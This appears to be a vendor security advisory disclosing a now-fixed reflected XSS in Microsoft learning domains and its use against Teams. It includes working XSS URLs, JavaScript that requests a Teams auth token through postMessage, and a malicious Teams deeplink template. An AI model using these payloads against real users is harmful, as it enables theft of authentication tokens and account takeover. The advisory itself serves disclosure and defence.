Cross-Site Scripting in Multiple Microsoft Domains and Microsoft Teams

A reflected cross site scripting (XSS) vulnerability affected the parameters of /auth/start.html at the following domains:

• learningclient-canary.teams.microsoft.com
• web.vivalearn.microsoft.com
• client.learningapp.microsoft.com

An XSS on these domains could lead to a number of impacts, the most serious of which could be achieved via client.learningapp.microsoft.com

As that domain is a trusted domain for the Viva Learning app in Microsoft Teams, an attacker could create a malicious link which could lead to the theft of a user's authentication tokens for a number of Microsoft services (including Teams). 

Proof of Concept:

Note: as the issue has been fixed, these XSS payloads will no longer trigger.

The simplest proof of concept would be triggering a simple alert box:

https://client.learningapp.microsoft.com/auth/start.html?provider=LiLHub&loginWebUrl=https://www.linkedin.com/&prompt=%22%2F%3E%3C%2Fform%3E%3Cform%20name%3D%22loginForm%22%2F%3E%3Cimg%20src=x%20onerror=alert(document.domain)%20/%3E

However, we could also craft a more complicated payload by instead running eval(atob("some_payload_in_base64")). For example, we could create one which executes the following:

if (typeof initOnNativeMessageProxy == 'function') {
    initOnNativeMessageProxy(function (event) {
        alert(JSON.stringify(event))
    });
    nativeInterface.framelessPostMessage('{ "id": "Tenable",
                                            "func": "authentication.getAuthToken", 
                                            "args": [[ "https://teams.microsoft.com" ]]}');
} else {
    function receiveMessage(event) {
        if (event.data.id == "Tenable" && event.data.origin != null) {
            alert(JSON.stringify(event.data))
        }
    }
    window.addEventListener("message", receiveMessage, false);
    top.postMessage({
        "id": "Tenable",
        "func": "authentication.getAuthToken",
        "args": [
            ["https://teams.microsoft.com"]
        ]
    }, "*");
}

This javascript, when run in the context of an iframe opened in Microsoft Teams, will use javascript postMessage() to get authentication token for teams.microsoft.com, and then pop an alert box containing the postMessage() response (though an attacker could just as easily send the token to a listener).

This would work in either the desktop client or the browser version of Teams (desktop clients making use of framelessPostMessage).

Combining this with the fact that client.learningapp.microsoft.com is a trusted domain for Viva Learning allows an attacker to craft a Microsoft Teams deeplink as follows :
 

https://teams.microsoft.com/_#/l/task/2e3a628d-6f54-4100-9e7a-f00bc3621a85?url=https://client.learningapp.microsoft.com/auth/start.html?provider=LiLHub&loginWebUrl=https://www.linkedin.com/&prompt="/></form><form name="loginForm"/><img src=x onerror=eval(atob("BASE64_Payload")) />

Where 2e3a628d-6f54-4100-9e7a-f00bc3621a85 corresponds to the Viva Learning App.

This link, when clicked within a Microsoft Teams chat would allow an attacker to steal the victims auth tokens.